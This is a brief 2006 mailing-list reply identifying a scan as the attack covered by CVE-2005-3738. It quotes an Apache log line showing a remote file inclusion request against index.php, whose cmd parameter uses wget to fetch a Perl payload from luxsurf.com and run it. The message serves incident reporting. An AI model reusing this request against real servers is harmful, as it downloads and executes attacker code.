On Sat, May 13, 2006 at 10:36:41AM -0300, Daniel Cid wrote: > Since Thursday night I'm seeing a high volume of scans ... > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0"
This looks like what's covered by CVE-2005-3738 and described here: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html George -- [EMAIL PROTECTED]
pgpWoSDUznijT.pgp
Description: PGP signature
